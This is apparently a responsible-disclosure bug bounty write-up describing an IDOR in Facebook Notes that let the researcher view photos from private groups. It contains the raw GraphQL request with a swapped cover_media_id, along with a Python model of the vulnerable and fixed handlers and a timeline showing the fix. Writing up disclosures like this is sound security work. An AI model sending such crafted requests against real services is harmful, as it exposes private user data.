Hi, this is Raja Sudhakar from Coimbatore, Tamil Nadu. I am an independent security researcher. This post is about a vulnerability I discovered in Facebook Notes that let me view media from any Facebook group, including private groups I was not a member of. Facebook acknowledged the issue promptly, fixed it, and rewarded me with a US $10,000 bounty based on the severity and impact of the vulnerability.
Facebook Notes was a feature of Facebook that allowed users to write and publish longer-form content, similar to blog posts or articles. It was introduced as a way to share more detailed and substantial content than regular status updates or short posts. Notes supported rich-text formatting such as headings, bullet points, images, and hyperlinks.
IDOR (Insecure Direct Object References)
Reference: https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References
POST /api/graphql/ HTTP/2
Host: www.facebook.com
Cookie: sb=AI6rZMwnqkTXORscLvl-6exQ; dpr=2; datr=AI6rZKHF74ih8Kwg3W7AqugP; c_user=100007305343287; wd=1600x881; m_page_voice=100079998952942;

------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="__hs"

2
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="__ccg"

15
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="fb_dtsg"

RelayModern
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="fb_api_req_friendly_name"

usePaperCreateDocumentVersionForLexical_Mutation
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="variables"

{"connections":["client:1081791239468083:__PaperDocumentVersionHistoryPanel__documentVersions_connection"],"input":{"client_mutation_id":"16","actor_id":"100007305343287","document_case_id":"1081791239468083","source_payload":{"cover_media_id":"3566344510300190","cover_media_offset_y":0,"media_ids":[],"payload":"{\"root\":{\"children\":[{\"children\":[{\"detail\":0,\"format\":0,\"mode\":\"normal\",\"style\":\"\",\"text\":\"qwerty\",\"type\":\"text\",\"version\":1}],\"direction\":\"ltr\",\"format\":\"\",\"indent\":0,\"type\":\"paragraph\",\"version\":1}],\"direction\":\"ltr\",\"format\":\"\",\"indent\":0,\"type\":\"root\",\"version\":1}}","subtitle":"","title":"Attacker Note"},"version":10}}
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="server_timestamps"

true
The mutation above saves a new version of one of my own notes (document_case_id) and attaches the photo referenced by cover_media_id as its cover. The server verified that I owned the note, but it never checked whether I was allowed to view the media I referenced. Replacing the cover_media_id value with the media id of a photo posted in a victim's private group made that photo the cover of my note, so I could view media from a group I was not a member of. This is a classic IDOR: the object id is supplied by the client and the authorization check on that object is missing.
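To make the missing check concrete, here is an added example I wrote for this post; it is not Facebook's code and does not reproduce their implementation. It models a minimal "create document version" handler shaped like the mutation above, with an in-memory media store and a group-membership model, and shows the vulnerable handler that trusts cover_media_id next to a fixed one that authorizes the referenced media against the acting user before attaching it. The ids, the visibility model and all function names are assumptions chosen for illustration.

```python
"""Added illustration of the cover_media_id IDOR and its fix.

Everything here is constructed for the example: the media store, the group
model, the sample ids and the handler names are assumptions, not Facebook's
implementation.
"""
from dataclasses import dataclass, field, replace
from typing import Callable, Optional


@dataclass
class Media:
    media_id: str
    owner_id: str
    group_id: Optional[str] = None  # None: media is not posted in a group


@dataclass
class Group:
    group_id: str
    private: bool
    members: set = field(default_factory=set)


@dataclass
class Document:
    document_case_id: str
    owner_id: str
    cover_media_id: Optional[str] = None
    title: str = ""


class AuthorizationError(Exception):
    pass


# Constructed sample data: the attacker owns a note; the victim posted a
# photo in a private group the attacker does not belong to.
MEDIA = {
    "1001": Media("1001", owner_id="attacker"),
    "3566344510300190": Media("3566344510300190", owner_id="victim", group_id="private-group"),
}
GROUPS = {"private-group": Group("private-group", private=True, members={"victim"})}
DOCUMENTS = {"1081791239468083": Document("1081791239468083", owner_id="attacker")}


def can_view_media(actor_id: str, media: Media) -> bool:
    """Object-level authorization: may this actor see this media object?"""
    if media.owner_id == actor_id:
        return True
    if media.group_id is None:
        return True  # assumption for the example: non-group media is public
    group = GROUPS[media.group_id]
    return (not group.private) or actor_id in group.members


def create_version_vulnerable(actor_id: str, document_case_id: str,
                              cover_media_id: str, title: str) -> Document:
    doc = DOCUMENTS[document_case_id]
    if doc.owner_id != actor_id:
        raise AuthorizationError("not the document owner")
    # BUG: only the existence of the media id is checked, not whether the
    # actor may view it. Any valid id, including a photo from a private
    # group the actor is not in, becomes the note's cover.
    if cover_media_id not in MEDIA:
        raise KeyError("unknown media")
    return replace(doc, cover_media_id=cover_media_id, title=title)


def create_version_fixed(actor_id: str, document_case_id: str,
                         cover_media_id: str, title: str) -> Document:
    doc = DOCUMENTS[document_case_id]
    if doc.owner_id != actor_id:
        raise AuthorizationError("not the document owner")
    media = MEDIA.get(cover_media_id)
    # FIX: authorize the referenced object against the acting user before
    # attaching it. Using the same error for "missing" and "not visible"
    # also avoids confirming that a private media id exists.
    if media is None or not can_view_media(actor_id, media):
        raise KeyError("unknown media")
    return replace(doc, cover_media_id=cover_media_id, title=title)


def try_attach(handler: Callable[..., Document], actor_id: str,
               document_case_id: str, cover_media_id: str) -> str:
    """Run a handler and summarize the outcome as a string for the demo."""
    try:
        doc = handler(actor_id, document_case_id, cover_media_id, "Attacker Note")
        return "attached " + str(doc.cover_media_id)
    except (KeyError, AuthorizationError) as exc:
        return "rejected: " + str(exc.args[0])


if __name__ == "__main__":
    victim_photo = "3566344510300190"
    print(try_attach(create_version_vulnerable, "attacker", "1081791239468083", victim_photo))
    print(try_attach(create_version_fixed, "attacker", "1081791239468083", victim_photo))
```

The vulnerable handler happily attaches the victim's private photo because the only question it asks is "does this id exist?"; the fixed handler asks "may this actor view this object?" and fails closed. The general lesson for any API that accepts object ids from the client is that ownership of the container (here the note) does not imply permission on the things placed inside it; each referenced object needs its own check.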
13 July 2023 at 14:20 : Report sent to Facebook Security team
13 July 2023 at 20:46 : Bug acknowledged by Facebook Security team
19 July 2023 at 17:36 : Vulnerability Fixed
26 July 2023 at 19:54 : Bounty of $10,000 awarded by Facebook
Thanks to the Facebook security team for quickly fixing the issue.
Note: This is being published with the permission of Facebook under the responsible disclosure policy. The vulnerability is now fixed.